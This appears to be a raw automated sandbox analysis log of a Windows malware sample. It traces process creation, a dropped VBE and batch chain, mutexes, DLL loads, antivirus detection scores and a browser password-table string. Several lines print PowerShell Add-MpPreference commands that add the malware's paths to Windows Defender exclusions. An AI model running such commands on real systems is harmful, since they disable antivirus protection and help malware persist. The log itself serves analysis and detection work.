Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Mutant created: NULL
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-B36Ltm7X6ZT1qAIt57Ky
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03

Source: C:\portintosvc\driverInto.exe

File created: C:\Users\user\AppData\Local\Temp\gDT3vrmrV2

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" "

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Command line argument: sfxname	0_2_0101DF1E
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Command line argument: sfxstime	0_2_0101DF1E
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Command line argument: STARTDLG	0_2_0101DF1E

Source: Vqzx4PFehn.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7ZM62vKokH.25.dr, XH0l3EA6US.25.dr, XFBJ4ivL6T.25.dr, aatb8W3AVz.25.dr, DdCBjfyxuu.25.dr, 4xF0ndNYR1.25.dr, DOZALIe7mA.25.dr, PzXT2lkpI9.25.dr, mOVdiwrw9I.25.dr, chBRvlN2pN.25.dr, ZaT8ByDEyf.25.dr, 4JEijRsXB3.25.dr, RGjzexYIco.25.dr, lbde1gtHxg.25.dr, xfipqq1p8e.25.dr, 1XLlMziEAg.25.dr, cm36ikub3D.25.dr, XHZm90MClc.25.dr, QOSa21ACkN.25.dr, 8bow8ajICu.25.dr, sYSYXONfMF.25.dr, 6RlmaiBDJh.25.dr, ioPbfUZlBC.25.dr, s5lJY8tuip.25.dr, c58700x8F4.25.dr, GdB4o2Atya.25.dr, xM1Nd8MkBx.25.dr, CdrHKSyFQn.25.dr, B4RFcMEvKM.25.dr, r3vpaV4K4x.25.dr, q5NoW3a56g.25.dr, 4nwBgY6nYM.25.dr, 8RQK1aDBdJ.25.dr, Vnl6vfjE2e.25.dr, k2kD7gtsCl.25.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Vqzx4PFehn.exe	ReversingLabs: Detection: 60%
Source: Vqzx4PFehn.exe	Virustotal: Detection: 70%

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

File read: C:\Users\user\Desktop\Vqzx4PFehn.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Vqzx4PFehn.exe "C:\Users\user\Desktop\Vqzx4PFehn.exe"
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portintosvc\driverInto.exe "C:\portintosvc/driverInto.exe"
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe'
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portintosvc\driverInto.exe "C:\portintosvc/driverInto.exe"	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe"

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: version.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
